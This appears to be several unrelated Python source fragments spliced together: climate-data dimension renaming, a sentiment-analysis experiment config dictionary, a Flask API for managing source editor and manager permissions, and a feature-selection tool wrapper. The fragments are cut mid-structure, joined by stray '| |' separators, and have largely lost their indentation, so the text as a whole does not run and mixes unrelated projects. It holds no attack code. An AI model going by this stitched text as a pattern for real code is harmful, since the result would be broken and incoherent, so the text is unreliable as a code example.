newdims = replace_at_index(newdims,newdims.index('nlat'),'lat')
if 'nlon' in dims:
newdims = replace_at_index(newdims,newdims.index('nlon'),'lon')
if 'nlay' in dims:
newdims = replace_at_index(newdims,newdims.index('nlay'),'pfull')
if 'ntod' in dims:
if todflag:
newdims = replace_at_index(newdims,newdims.index('ntod'),None)
else:
newdims = replace_at_index(newdims,newdims.index('ntod'),'time_of_day_16')
return newdims
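# Example of the dimension renaming performed above (dimension names follow
# the LegacyGCM files this script converts):
#
#     replace_dims(('time', 'ntod', 'nlay', 'nlat', 'nlon'), todflag=False)
#     # -> ('time', 'time_of_day_16', 'pfull', 'lat', 'lon')
#
# With todflag=True the 'ntod' entry is dropped instead of being renamed.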
def replace_at_index(tuple_dims, idx, new_name):
'''
Function to update dimensions.
Args:
        tup: dimensions as tuples, e.g. ('time', 'nlat', 'nlon')
        idx: index of the dimension to replace
        new_name: new dimension name, or None to drop that dimension
    '''
    if new_name is None:
        return tuple_dims[:idx] + tuple_dims[idx + 1:]
    return tuple_dims[:idx] + (new_name,) + tuple_dims[idx + 1:]
THE_BOOK_OF_EXPERIMENTS = {
"brahmaputra": {
"imdb": [
{
"experiment_name": "SA_EMBED_NGRAM_CNN_RNN",
"experiment_description": "Train with preloaded spacy vectors. "
"Here we see the impact of freezing the"
" embedding layer. This is a regression "
"experiment without rescaling the ground "
"truth to 0-1. Very little weight decay",
"dataset": {
"name": "IMDB",
"n_workers": 5,
"load_spacy_vectors": True,
"max_seq_length": 400,
"cuda": True
},
"setup": {
"epochs": 30,
"batch_size": 32,
"evaluate_every": 450,
"save_every": 450,
"early_stopping_delta": 0.2,
"patience": 12,
"train_on_gpu": True,
"save_embeddings": False
},
"pipeline": {
"embedding_layer": {
"embedding_dims": 300,
"embedding_dropout": 0.5,
"preload_word_vectors": True,
"train_embeddings": False
},
"ngram_cnn": {
"cnn_kernel_dims": 500,
"cnn_kernel_sizes": [3, 5, 9, 13],
"cnn_layers": 1,
"cnn_dropout": 0.5
},
"rnn": {
"rnn_hidden_size": 600,
"rnn_layers": 2,
"bidirectional": True,
"rnn_dropout": 0.5,
"cell_type": "gru"
},
"regression": {
"activation": "relu"
}
},
"optimizer" : {
"learning_rate": 0.001,
"weight_decay": 0.00001,
"lr_scheduling_milestones": [2, 7, 15, 19]
}
},
{
"experiment_name": "SA_EMBED_NGRAM_CNN_RNN",
"experiment_description": "Train with preloaded spacy vectors. "
"Here we see the impact of rescaling "
"the ground truth to 0-1 and adding a "
"sigmoid activation function at the "
"last layer (regression layer). No "
"weight decay",
"dataset": {
"name": "IMDB",
"n_workers": 9,
"load_spacy_vectors": True,
"max_seq_length": 400,
"rescale": (0, 1),
"cuda": True
},
"setup": {
"epochs": 30,
"batch_size": 32,
"evaluate_every": 450,
"save_every": 450,
"early_stopping_delta": 0,
"patience": 12,
"train_on_gpu": True,
"save_embeddings": False
},
"pipeline": {
"embedding_layer": {
"embedding_dims": 300,
"embedding_dropout": 0.5,
"preload_word_vectors": True,
"train_embeddings": False
},
"ngram_cnn": {
"cnn_kernel_dims": 500,
"cnn_kernel_sizes": [3, 5, 9, 13],
"cnn_layers": 1,
"cnn_dropout": 0.5
},
"rnn": {
"rnn_hidden_size": 600,
"rnn_layers": 2,
"bidirectional": True,
"rnn_dropout": 0.5,
"cell_type": "gru"
},
"regression": {
"activation": "sigmoid"
}
},
"optimizer" : {
"learning_rate": 0.001,
"weight_decay": 0.0,
"lr_scheduling_milestones": [2, 7, 15, 19]
}
},
{
"experiment_name": "SA_EMBED_NGRAM_CNN_RNN",
"experiment_description": "Train with preloaded spacy vectors. "
"Here we see the impact of having a "
"very small network. Rescaled GT with "
"sigmoid",
"dataset": {
"name": "IMDB",
"n_workers": 9,
"load_spacy_vectors": True,
"max_seq_length": 400,
"rescale": (0, 1),
"cuda": True
},
"setup": {
"epochs": 30,
"batch_size": 32,
"evaluate_every": 450,
"save_every": 450,
"early_stopping_delta": 0,
"patience": 12,
"train_on_gpu": True,
"save_embeddings": False
},
"pipeline": {
"embedding_layer": {
"embedding_dims": 300,
"embedding_dropout": 0.5,
"preload_word_vectors": True,
"train_embeddings": False
},
"ngram_cnn": {
"cnn_kernel_dims": 50,
"cnn_kernel_sizes": [3, 5, 9, 13],
"cnn_layers": 1,
"cnn_dropout": 0.5
},
"rnn": {
"rnn_hidden_size": 100,
"rnn_layers": 1,
"bidirectional": True,
"rnn_dropout": 0.5,
"cell_type": "gru"
},
"regression": {
"activation": "sigmoid"
}
},
"optimizer" : {
"learning_rate": 0.001,
"weight_decay": 0.0,
"lr_scheduling_milestones": [2, 7, 15, 19]
}
},
{
"experiment_name": "SA_EMBED_NGRAM_CNN_RNN",
"experiment_description": "Train with preloaded spacy vectors and "
"use spacy's vocab. Here we also train"
" the embeddings along with the "
"network. Medium sized network. Weight "
"decay",
"dataset": {
"name": "IMDB",
"n_workers": 9,
"use_spacy_vocab": True,
"load_spacy_vectors": True,
"max_seq_length": 300,
"rescale": (0, 1),
"cuda": True
},
"setup": {
"epochs": 30,
"batch_size": 32,
"evaluate_every": 450,
"save_every": 450,
"early_stopping_delta": 0.2,
"patience": 12,
"train_on_gpu": True,
"save_embeddings": True
},
"pipeline": {
"embedding_layer": {
"embedding_dims": 300,
"embedding_dropout": 0.5,
"preload_word_vectors": True,
"train_embeddings": True
},
"ngram_cnn": {
"cnn_kernel_dims": 600,
"cnn_kernel_sizes": [3, 5, 9, 13, 20],
"cnn_layers": 1,
"cnn_dropout": 0.5
},
"rnn": {
"rnn_hidden_size": 1200,
"rnn_layers": 3,
"bidirectional": True,
"rnn_dropout": 0.5,
"cell_type": "gru"
},
"regression": {
"activation": "sigmoid"
}
},
"optimizer" : {
"learning_rate": 0.001,
"weight_decay": 0.00001,
"lr_scheduling_milestones": [2, 7, 15, 19]
}
},
{
"experiment_name": "SA_EMBED_NGRAM_CNN_RNN",
"experiment_description": "Train with preloaded spacy vectors. "
"Here we see the impact of freezing the"
" embedding layer. This is a regression "
"experiment without rescaling the ground "
"truth to 0-1. Very little weight "
"decay. Here we use an LSTM cell",
"dataset": {
"name": "IMDB",
"n_workers": 9,
"load_spacy_vectors": True,
"max_seq_length": 400,
"cuda": True
},
"setup": {
"epochs": 30,
"batch_size": 32,
"evaluate_every": 450,
"save_every": 450,
"early_stopping_delta": 0.2,
"patience": 12,
"train_on_gpu": True,
"save_embeddings": False
},
"pipeline": {
"embedding_layer": {
"embedding_dims": 300,
"embedding_dropout": 0.5,
"preload_word_vectors": True,
"train_embeddings": False
},
"ngram_cnn": {
"cnn_kernel_dims": 500,
"cnn_kernel_sizes": [3, 5, 9, 13],
"cnn_layers": 1,
"cnn_dropout": 0.5
},
"rnn": {
"rnn_hidden_size": 600,
"rnn_layers": 2,
"bidirectional": True,
"rnn_dropout": 0.5,
"cell_type": "lstm"
},
"regression": {
"activation": "relu"
}
},
"optimizer" : {
"learning_rate": 0.001,
"weight_decay": 0.00001,
"lr_scheduling_milestones": [2, 7, 15, 19]
}
}
],
"amazon_reviews_imbalanced_de": [
{
"experiment_name": "SA_EMBED_NGRAM_CNN_RNN",
"experiment_description": "Train with preloaded spacy vectors. "
"Here we see the impact of rescaling "
"the ground truth to 0-1 and adding a "
"relu activation function at the "
"last layer (regression layer). No "
"weight decay",
"dataset": {
"name": "amazon_reviews_imbalanced_de",
"n_workers": 5,
"load_spacy_vectors": True,
"max_seq_length": 150,
"rescale": (0, 1),
"cuda": True
},
"setup": {
"epochs": 30,
"batch_size": 32,
"evaluate_every": 5000,
"save_every": 5000,
"early_stopping_delta": 0.0001,
"patience": 12,
"train_on_gpu": True,
"save_embeddings": False
},
"pipeline": {
"embedding_layer": {
"embedding_dims": 300,
"embedding_dropout": 0.1,
"preload_word_vectors": True,
"train_embeddings": True
},
"ngram_cnn": {
"cnn_kernel_dims": 500,
"cnn_kernel_sizes": [3, 5, 9, 13],
"cnn_layers": 1,
"cnn_dropout": 0.2
},
"rnn": {
"rnn_hidden_size": 600,
"rnn_layers": 2,
"bidirectional": True,
"rnn_dropout": 0.3,
"cell_type": "gru"
},
"regression": {
"activation": "sigmoid"
}
},
"optimizer" : {
"learning_rate": 0.001,
"weight_decay": 0.0,
"lr_scheduling_milestones": [2, 7, 15, 19]
}
},
{
"experiment_name": "SA_EMBED_NGRAM_CNN_RNN",
"experiment_description": "Train with preloaded spacy vectors. "
"Here we see the impact of having a "
"very small network. Rescaled GT with "
"relu",
"dataset": {
"name": "amazon_reviews_imbalanced_de",
"n_workers": 5,
"load_spacy_vectors": True,
"max_seq_length": 130,
"cuda": True
},
"setup": {
"epochs": 30,
"batch_size": 32,
"evaluate_every": 5000,
"save_every": 5000,
"early_stopping_delta": 0.0001,
"patience": 12,
"train_on_gpu": True,
"save_embeddings": False
},
"pipeline": {
"embedding_layer": {
"embedding_dims": 300,
"embedding_dropout": 0.1,
"preload_word_vectors": True,
"train_embeddings": False
},
"ngram_cnn": {
"cnn_kernel_dims": 50,
"cnn_kernel_sizes": [3, 5, 9, 13],
"cnn_layers": 1,
"cnn_dropout": 0.2
},
"rnn": {
"rnn_hidden_size": 100,
"rnn_layers": 1,
"bidirectional": True,
"rnn_dropout": 0.3,
"cell_type": "gru"
},
"regression": {
"activation": "sigmoid"
}
},
"optimizer" : {
"learning_rate": 0.001,
"weight_decay": 0.0,
"lr_scheduling_milestones": [2, 7, 15, 19]
}
}
],
"stanford_sentiment_treebank": [
{
"experiment_name": "SA_EMBED_NGRAM_CNN_RNN",
"experiment_description": "Train with preloaded spacy vectors. "
"Here we see the impact of rescaling "
"the ground truth to 0-1 and adding a "
"relu activation function at the "
"last layer (regression layer). No "
"weight decay",
"dataset": {
"name": "stanford_sentiment_treebank",
"n_workers": 5,
"use_spacy_vocab": True,
"load_spacy_vectors": True,
"max_seq_length": 0,
"cuda": True
},
"setup": {
"epochs": 30,
"batch_size": 32,
"evaluate_every": 100,
"save_every": 100,
"early_stopping_delta": 0.0,
"patience": 100000,
"train_on_gpu": True,
"save_embeddings": False
},
"pipeline": {
"embedding_layer": {
"embedding_dims": 300,
"embedding_dropout": 0.1,
"preload_word_vectors": True,
"train_embeddings": False
},
"ngram_cnn": {
"cnn_kernel_dims": 500,
"cnn_kernel_sizes": [3, 5, 9, 13],
"cnn_layers": 1,
"cnn_dropout": 0.2
},
"rnn": {
"rnn_hidden_size": 600,
"rnn_layers": 2,
"bidirectional": True,
"rnn_dropout": 0.3,
"cell_type": "gru"
},
"regression": {
"activation": "relu"
}
},
"optimizer" : {
"learning_rate": 0.001,
"weight_decay": 0.00001,
"lr_scheduling_milestones": [2, 7, 15, 19]
}
}
]
},
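    # Note: every experiment dict above and below follows the same schema:
    # 'dataset' (loader options), 'setup' (training loop and early stopping),
    # 'pipeline' (embedding_layer -> ngram_cnn -> rnn -> regression or
    # classification head) and 'optimizer' (learning rate, weight decay,
    # LR-scheduling milestones). Assumption: these entries are consumed by an
    # experiment runner defined elsewhere in the project.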
"yamuna": {
"imdb": [
{
"experiment_name": "SA_EMBED_NGRAM_CNN_RNN_CLASSIFICATION",
"experiment_description": "Train with preloaded spacy vectors. "
"Here we see the impact of freezing the"
" embedding layer.",
"dataset": {
"name": "IMDB",
"n_workers": 5,
"load_spacy_vectors": True,
"max_seq_length": 400,
"cuda": True
},
"setup": {
"epochs": 30,
"batch_size": 32,
"evaluate_every": 450,
"save_every": 450,
"early_stopping_delta": 0.0,
"patience": 20,
"train_on_gpu": True,
"save_embeddings": False
},
"pipeline": {
"embedding_layer": {
"embedding_dims": 300,
"embedding_dropout": 0.1,
"preload_word_vectors": True,
"train_embeddings": True
},
"ngram_cnn": {
"cnn_kernel_dims": 500,
"cnn_kernel_sizes": [3, 5, 9, 13],
"cnn_layers": 1,
"cnn_dropout": 0.2
},
"rnn": {
"rnn_hidden_size": 600,
"rnn_layers": 2,
"bidirectional": True,
"rnn_dropout": 0.3,
"cell_type": "gru"
}
},
"optimizer" : {
"learning_rate": 0.001,
"weight_decay": 0.0,
"lr_scheduling_milestones": [2, 7, 15, 19]
}
},
{
"experiment_name": "SA_EMBED_NGRAM_CNN_RNN_CLASSIFICATION",
"experiment_description": "Train with preloaded spacy vectors. "
"Here we see the impact of having a "
"very small network",
"dataset": {
"name": "IMDB",
"n_workers": 9,
"load_spacy_vectors": True,
"max_seq_length": 400,
"cuda": True
},
"setup": {
"epochs": 30,
"batch_size": 32,
"evaluate_every": 450,
"save_every": 450,
"early_stopping_delta": 0,
"patience": 12,
"train_on_gpu": True,
"save_embeddings": False
},
"pipeline": {
"embedding_layer": {
"embedding_dims": 300,
"embedding_dropout": 0.5,
"preload_word_vectors": True,
"train_embeddings": False
},
"ngram_cnn": {
"cnn_kernel_dims": 50,
"cnn_kernel_sizes": [3, 5, 9, 13],
"cnn_layers": 1,
"cnn_dropout": 0.5
},
"rnn": {
"rnn_hidden_size": 100,
"rnn_layers": 1,
"bidirectional": True,
"rnn_dropout": 0.5,
"cell_type": "gru"
}
},
"optimizer" : {
"learning_rate": 0.001,
"weight_decay": 0.0,
"lr_scheduling_milestones": [2, 7, 15, | |
= SourceRecord.get_sources_search_of_user_as_editor(current_user, status=status)
editor = []
for hit in sources:
editor.append(
{
'id': hit['id'],
'name': hit['name'],
'source_status': hit['source_status'],
'version_to_review': True
}
)
sources_terms = get_arguments_for_source_from_action(
current_user, 'source_term_manager_actions'
)
terms = Term.query.filter(Term.uuid.in_(sources_terms)).all()
sources_orgs = get_arguments_for_source_from_action(
current_user, 'source_organization_manager_actions'
)
orgs = []
for org in sources_orgs:
orgs.append(CuorHelper.query_cuor_by_uuid(org))
response = iroko_json_response(
IrokoResponseStatus.SUCCESS,
'ok',
'sources',
{
'manager': manager,
'editor': editor,
'terms': term_schema_many.dump(terms),
'organizations': orgs,
'admin': is_user_sources_admin(current_user)
}
)
# else:
# raise Exception("role should be manager or editor")
# # print("## iroko_json_response {0}".format(datetime.datetime.now().strftime("%H:%M:%S")))
return response
except Exception as e:
msg = str(e)
return iroko_json_response(IrokoResponseStatus.ERROR, msg, None, None)
@api_blueprint.route('/editor/<uuid>/versions', methods=['GET'])
@require_api_auth()
def get_editor_source_versions(uuid):
try:
        # list this editor's versions that have not yet been reviewed, so they can still be changed
source = SourceRecord.get_record(uuid)
# print('source> ', source)
if not source:
raise Exception('Not source found')
if source.user_has_edit_permission(current_user):
versions = source.get_editor_versions_not_reviewed()
return iroko_json_response(
IrokoResponseStatus.SUCCESS, \
'ok', 'source', \
{
'data': source,
'versions': source_version_schema_many.dump(versions),
'count': 1
}
            )
        raise PermissionDenied()
except PermissionDenied as err:
msg = 'Permission denied for changing source'
return iroko_json_response(IrokoResponseStatus.ERROR, msg, None, None)
except Exception as e:
return iroko_json_response(IrokoResponseStatus.ERROR, str(e), None, None)
def _get_sources_stats(org_id, offset):
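    """
    Build the Elasticsearch aggregations behind the /stats endpoint.
    When org_id is given, the organization is looked up in CUOR and the
    SourceSearch is filtered by it. Sources are bucketed by organization,
    classification and source type; the top-level SUBJECTS/INDEXES vocabulary
    terms and the organization's children are annotated with source_count.
    Returns a dict with sources_count, up to 'offset' sources sorted by their
    last-update field (last_sources), org, subjects, indexes and source_types.
    """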
# TODO:
    # 1- get the organization with its children from CUOR.
    # result = dict()
    # result['id'] = 'orgID'
    # 2- for each of the organization's children
    # for now this is fine as is
# print("************************** START get aggr {0}".format(datetime.datetime.now(
# ).strftime("%H:%M:%S")))
search = SourceSearch()
org = dict()
if org_id:
org = CuorHelper.query_cuor_by_uuid(org_id)
# print('******************* ORG *******************',org)
if not org or 'metadata' not in org:
org_id = None
org = {}
# raise Exception('Organization with ID: {0} not found'.format(org_id))
if org_id:
search = search.filter('term', organizations__id=org_id)
bucket_org = A('terms', field='organizations.id', size=999999)
search.aggs.bucket('orgs', bucket_org)
# print("************************** CUOR REQUEST get aggr {0}".format(datetime.datetime.now(
# ).strftime("%H:%M:%S")))
# classification bucket
# subjects
# vocab = Vocabulary.query.filter_by(
# identifier=IrokoVocabularyIdentifiers.SUBJECTS.value).first()
subjects_terms = Term.query.filter_by(
vocabulary_id=IrokoVocabularyIdentifiers.SUBJECTS.value,
parent_id=None
).all()
subjects = term_schema_many.dump(
subjects_terms
) # erm_node_schema.dump_term_node_list(subjects_terms, 0, 0)
# indexes
# vocab = Vocabulary.query.filter_by(
# identifier=IrokoVocabularyIdentifiers.INDEXES.value).first()
indexes_terms = Term.query.filter_by(
vocabulary_id=IrokoVocabularyIdentifiers.INDEXES.value,
parent_id=None
).all()
indexes = term_schema_many.dump(
indexes_terms
) # term_node_schema.dump_term_node_list(indexes_terms, 0, 0)
# bucket
bucket_classifications = A('terms', field='classifications.id', size=999999)
search.aggs.bucket('classifications', bucket_classifications)
# source_type bucket
source_types = []
for k in SourceType:
source_types.append(
{
'source_type': k.value
}
)
# print(k.value, '*****')
bucket_source_type = A('terms', field='source_type', size=999999)
search.aggs.bucket('source_type', bucket_source_type)
# print("************************** SEARCH EXEC get aggr {0}".format(datetime.datetime.now(
# ).strftime("%H:%M:%S")))
search.sort('_save_info_updated')
response = search[0:offset].execute()
hits = []
for hit in response.hits:
hits.append(
{
'id': hit['id'],
'name': hit['name']
}
)
# print("************************** MI COSA get aggr {0}".format(datetime.datetime.now(
# ).strftime("%H:%M:%S")))
if org_id:
org['metadata']['source_count'] = search.count()
for item in response.aggregations.orgs.buckets:
# print('****** org ******', item.doc_count, item.key)
CuorHelper.append_key_value_to_relationship(
org, item.key, 'child', 'source_count', item.doc_count
)
for item in response.aggregations.classifications.buckets:
# print('****** class ******', item.doc_count, item.key)
for term in subjects:
# print('************ term ', term['uuid'])
if str(term['uuid']) == item.key:
term['source_count'] = item.doc_count
for term in indexes:
# print('************ term ', term['uuid'])
if str(term['uuid']) == item.key:
term['source_count'] = item.doc_count
for item in response.aggregations.source_type.buckets:
for t in source_types:
if t['source_type'] == item.key:
t['source_count'] = item.doc_count
# print("************************** END get aggr {0}".format(datetime.datetime.now(
# ).strftime("%H:%M:%S")))
result = {
'sources_count': search.count(),
'last_sources': hits,
'org': org,
'subjects': subjects,
'indexes': indexes,
'source_types': source_types
}
return result
@api_blueprint.route('/stats', methods=['GET'])
def get_sources_stats():
"""
"""
try:
offset = request.args.get('offset') if request.args.get('offset') else 3
# top organization bucket
org_id = request.args.get('org') if request.args.get('org') else None
cache = current_cache.get("get_sources_stats:{0}{1}".format(org_id, offset)) or {}
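        # Cache policy: results are stored under "get_sources_stats:<org_id><offset>"
        # and reused while they are younger than 300 seconds; otherwise the stats are
        # recomputed below and stored again (timeout=-1 keeps the entry until replaced).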
if "date" not in cache:
cache["date"] = datetime.datetime.now()
if datetime.datetime.now() - cache["date"] < datetime.timedelta(
seconds=300
) and "stats" in cache:
print(datetime.datetime.now())
print(cache["date"])
print(datetime.datetime.now() - cache["date"])
print(datetime.timedelta(seconds=300))
print("USING CACHE STATS")
result = cache["stats"]
return iroko_json_response(IrokoResponseStatus.SUCCESS, 'ok', 'aggr', result)
else:
result = _get_sources_stats(org_id, offset)
cache["date"] = datetime.datetime.now()
cache["stats"] = result
current_cache.set("get_sources_stats:{0}{1}".format(org_id, offset), cache, timeout=-1)
return iroko_json_response(IrokoResponseStatus.SUCCESS, 'ok', 'aggr', result)
except Exception as e:
return iroko_json_response(IrokoResponseStatus.ERROR, str(e), None, None)
@api_blueprint.route('/permission/editor/<uuid>/users', methods=['GET'])
@require_api_auth()
def get_users_source_editor(uuid):
"""
get the lists of user with permission of editor and manager
:param uuid: source uuid
:return:
"""
try:
source = SourceRecord.get_record(uuid)
if not source:
raise Exception('Not source found')
if source.user_has_manager_permission(current_user):
ids = get_user_ids_for_source_from_action('source_editor_actions', uuid)
users = User.query.filter(User.id.in_(ids)).all()
return iroko_json_response(
IrokoResponseStatus.SUCCESS,
'ok',
'permission',
{
'action': 'editor',
'source': uuid,
'users': user_schema_many.dump(users)
}
)
except Exception as e:
return iroko_json_response(IrokoResponseStatus.ERROR, str(e), None, None)
@api_blueprint.route('/permission/manager/<uuid>/users', methods=['GET'])
@require_api_auth()
def get_users_source_manager(uuid):
"""
get the lists of user with permission of editor and manager
:param uuid: source uuid
:return:
"""
try:
source = SourceRecord.get_record(uuid)
if not source:
raise Exception('Not source found')
if source.user_has_manager_permission(current_user):
ids = get_user_ids_for_source_from_action('source_manager_actions', uuid)
users = User.query.filter(User.id.in_(ids)).all()
return iroko_json_response(
IrokoResponseStatus.SUCCESS,
'ok',
'permission',
{
'action': 'manager',
'source': uuid,
'users': user_schema_many.dump(users)
}
)
except Exception as e:
return iroko_json_response(IrokoResponseStatus.ERROR, str(e), None, None)
@api_blueprint.route('/permission/organization/<uuid>/users', methods=['GET'])
@require_api_auth()
def get_users_organization(uuid):
"""
get the list of user with permission of organization manager
:param uuid: organization uuid
:return:
"""
try:
org = CuorHelper.query_cuor_by_uuid(uuid)
if not org:
raise Exception('Organization not found')
if is_user_sources_admin(current_user) or \
user_is_organization_manager(org['id'], current_user):
ids = get_user_ids_for_source_from_action('source_organization_manager_actions', uuid)
users = User.query.filter(User.id.in_(ids)).all()
return iroko_json_response(
IrokoResponseStatus.SUCCESS,
'ok',
'permission',
{
'action': 'manager',
'organization': uuid,
'users': user_schema_many.dump(users)
}
)
except Exception as e:
return iroko_json_response(IrokoResponseStatus.ERROR, str(e), None, None)
@api_blueprint.route('/permission/term/<uuid>/users', methods=['GET'])
@require_api_auth()
def get_users_term(uuid):
"""
get the lists of user with permission of term manager
:param uuid: term uuid
:return:
"""
try:
term = Term.query.filter_by(uuid=uuid).first()
if not term:
raise Exception('Term not found')
if is_user_sources_admin(current_user) or \
user_is_term_manager(term.uuid, current_user):
ids = get_user_ids_for_source_from_action('source_term_manager_actions', uuid)
users = User.query.filter(User.id.in_(ids)).all()
return iroko_json_response(
IrokoResponseStatus.SUCCESS,
'ok',
'permission',
{
'action': 'manager',
'term': uuid,
'users': user_schema_many.dump(users)
}
)
except Exception as e:
return iroko_json_response(IrokoResponseStatus.ERROR, str(e), None, None)
@api_blueprint.route('/permission/<user>/editor/<uuid>/allow', methods=['POST'])
@require_api_auth()
def set_source_editor_allow(user, uuid):
return set_source_editor(user, uuid, True)
@api_blueprint.route('/permission/<user>/editor/<uuid>/deny', methods=['POST'])
@require_api_auth()
def set_source_editor_deny(user, uuid):
return set_source_editor(user, uuid, False)
def set_source_editor(user, uuid, allow=False):
"""
Set user as editor of a source
:param uuid: source uuid
:param user: user id
    :param allow: whether to allow or deny
:return:
"""
try:
offset = request.args.get('offset') if request.args.get('offset') else 3
source = SourceRecord.get_record(uuid)
if not source:
raise Exception('Not source found')
userObj = User.query.filter_by(id=user).first()
if not userObj:
raise Exception('User not found')
if source.user_has_manager_permission(current_user):
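            # Replace any existing editor-permission row for this user/source,
            # then record an explicit allow or deny entry for ObjectSourceEditor.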
with db.session.begin_nested():
ActionUsers.query.filter_by(
user_id=user, action='source_editor_actions',
argument=uuid
).delete()
if allow:
db.session.add(ActionUsers.allow(ObjectSourceEditor(uuid), user=userObj))
else:
db.session.add(ActionUsers.deny(ObjectSourceEditor(uuid), user=userObj))
db.session.commit()
return iroko_json_response(
IrokoResponseStatus.SUCCESS,
'ok', 'permission',
{
'source': uuid,
'user': user,
'permission': 'editor',
'allow': allow
}
)
raise PermissionDenied()
except PermissionDenied as err:
msg = 'Permission denied'
return iroko_json_response(IrokoResponseStatus.ERROR, msg, None, None)
except Exception as e:
return iroko_json_response(IrokoResponseStatus.ERROR, str(e), None, None)
@api_blueprint.route('/permission/<user>/manager/<uuid>/allow', methods=['POST'])
@require_api_auth()
def set_source_manager_allow(user, uuid):
return set_source_manager(user, uuid, True)
@api_blueprint.route('/permission/<user>/manager/<uuid>/deny', methods=['POST'])
@require_api_auth()
def set_source_manager_deny(user, uuid):
return set_source_manager(user, uuid, False)
def set_source_manager(user, uuid, allow=False):
"""
Set user as manager of a source
:param uuid: source uuid
:param user: user id
    :param allow: whether to allow or deny
:return:
"""
try:
source = SourceRecord.get_record(uuid)
if not source:
raise Exception('Not source found')
userObj = User.query.filter_by(id=user).first()
if not userObj:
raise Exception('User not found')
if source.user_has_manager_permission(current_user):
with db.session.begin_nested():
ActionUsers.query.filter_by(
user_id=user, action='source_manager_actions',
argument=uuid
).delete()
if allow:
db.session.add(ActionUsers.allow(ObjectSourceManager(uuid), user=userObj))
else:
db.session.add(ActionUsers.deny(ObjectSourceManager(uuid), user=userObj))
db.session.commit()
return iroko_json_response(
IrokoResponseStatus.SUCCESS,
'ok', 'permission',
{
                    'source': uuid,
'user': user,
'permission': 'manager',
'allow': allow
}
)
raise PermissionDenied()
except PermissionDenied as err:
msg = 'Permission denied'
return iroko_json_response(IrokoResponseStatus.ERROR, msg, None, None)
except Exception as e:
return iroko_json_response(IrokoResponseStatus.ERROR, str(e), None, None)
@api_blueprint.route('/permission/<user>/organization/<uuid>/allow', methods=['POST'])
@require_api_auth()
def set_organization_manager_allow(user, uuid):
return set_organization_manager(user, uuid, True)
@api_blueprint.route('/permission/<user>/organization/<uuid>/deny', methods=['POST'])
@require_api_auth()
def set_organization_manager_deny(user, uuid):
return set_organization_manager(user, uuid, False)
def set_organization_manager(user, uuid, allow=False):
"""
Set user as manager of a organization
:param uuid: organization or term uuid
:param user: user id
:param allow: if allow or deny
:return:
"""
try:
userObj = User.query.filter_by(id=user).first()
if not userObj:
raise Exception('User not found')
org = CuorHelper.query_cuor_by_uuid(uuid)
if not org:
raise Exception('Organization not found')
parents = CuorHelper.get_relationships_parent(org)
print(parents)
allow_parent = False
for p in parents:
try:
allow_parent = user_is_organization_manager(p['id'], current_user)
except PermissionDenied:
pass
if is_user_sources_admin(current_user) or \
allow_parent or \
user_is_organization_manager(org['id'], current_user):
with db.session.begin_nested():
ActionUsers.query.filter_by(
user_id=user, action='source_organization_manager_actions',
argument=uuid
).delete()
if allow:
db.session.add(
ActionUsers.allow(ObjectSourceOrganizationManager(uuid), user=userObj)
)
else:
db.session.add(
ActionUsers.deny(ObjectSourceOrganizationManager(uuid), user=userObj)
)
db.session.commit()
return iroko_json_response(
IrokoResponseStatus.SUCCESS,
'ok', 'permission',
{
'org': uuid,
'user': user,
'permission': 'manager',
'allow': allow
}
)
raise PermissionDenied()
except PermissionDenied as err:
msg = 'Permission denied'
return iroko_json_response(IrokoResponseStatus.ERROR, msg, None, None)
except Exception as e:
return iroko_json_response(IrokoResponseStatus.ERROR, str(e), None, None)
@api_blueprint.route('/permission/<user>/term/<uuid>/allow', methods=['POST'])
@require_api_auth()
def set_term_manager_allow(user, uuid):
return set_term_manager(user, uuid, True)
@api_blueprint.route('/permission/<user>/term/<uuid>/deny', methods=['POST'])
@require_api_auth()
def set_term_manager_deny(user, uuid):
return set_term_manager(user, uuid, False)
def set_term_manager(user, uuid, allow=False):
"""
    Set user as manager of a term
:param uuid: | |
# k-fold CV (>=2)
self.parameters['CV_repeat'] = 1 # repeated k-fold CV
self.parameters['n_out'] = 100 # number of top models to be output, off when =0
# overwrite parameter values if specified in advanced_parameters
if not advanced_parameters is None:
for key, value in advanced_parameters.iteritems():
self.parameters[key] = value
# END INIT
def start(self):
""" Attribute which starts the calculations after init. """
# Check if folders exists. If yes delete (if self.rm_existing_files)
# or rename it to self.SIS_input_path_old_#
if os.path.isdir(self.SIS_input_path):
self.logger.warning('Directory %s already exists.' % self.SIS_input_path)
if self.rm_existing_files:
rmtree(self.SIS_input_path)
self.logger.warning('It is removed.')
else:
for i in range(1000):
old_name = "%s_old_%s" % (self.SIS_input_path, i)
if not os.path.isdir(old_name):
os.rename(self.SIS_input_path, old_name)
break
self.logger.warning('It is renamed to %s.' % old_name)
        # create input folder on local machine
        os.mkdir(self.SIS_input_path)
        # write input files into the input folder
self.write_P_D(self.P, self.D, self.feature_list)
self.write_parameters()
# decide if calculation on local or remote machine
if self.ssh_connection:
self.do_transfer(ssh=self.ssh, eos=self.eos, username=self.username, CPUs=self.CPUs)
else:
# calculate on local machine. (At the moment not clear if python blocks parallel computing)
os.chdir(self.SIS_input_path)
Popen(self.SIS_code_FCDI).wait()
def set_logger(self, output_log_file):
""" Set logger for outputs as errors, warnings, infos. """
self.logger = logging.getLogger(__name__)
hdlr = logging.FileHandler(output_log_file)
self.logger.setLevel(logging.INFO)
logging.basicConfig(level=logging.INFO)
FORMAT = "%(levelname)s: %(message)s"
formatter = logging.Formatter(fmt=FORMAT)
handler = logging.StreamHandler()
handler.setFormatter(formatter)
hdlr.setFormatter(formatter)
self.logger.addHandler(handler)
self.logger.addHandler(hdlr)
self.logger.setLevel(logging.INFO)
self.logger.propagate = False
    # START checking functions before calculations
def check_arrays(self, P_in, D, feature_list, feature_unit_classes, ptype):
""" Check arrays/list P, D and feature_list"""
P, D, feature_list = np.array(P_in), np.array(D), np.array(feature_list)
P_shape, D_shape, f_shape = P.shape, D.shape, feature_list.shape
if not len(D_shape) == 2:
self.logger.error(
'Dimension of feature matrix is %s. A two-dimensional list or array is needed.' %
len(D_shape))
sys.exit(1)
if not len(f_shape) == 1:
self.logger.error(
'Dimension of feature list is %s. A one-dimensional list or array is needed.' %
len(f_shape))
sys.exit(1)
if not P_shape[0] == D_shape[0]:
self.logger.error(
"Length (%s) of target property has to match to number of rows (%s) of feature matrix." %
(P_shape[0], D_shape[0]))
sys.exit(1)
if ptype == 'quanti':
if not all(isinstance(el, (float, int)) for el in P):
self.logger.error("For ptype = 'quanti', a 1-dimensional array of floats/ints is required is required.")
sys.exit(1)
if ptype == 'quali':
if not all(isinstance(el, int) for el in P_in):
self.logger.error("For ptype = 'quali', a 1-dimensional array of ints is required is required.")
sys.exit(1)
index = np.unique(P, return_index=True)[1]
class_names = P[np.sort(index)]
n_class = len(class_names)
current_i = 0
for p in P:
if not p == class_names[current_i]:
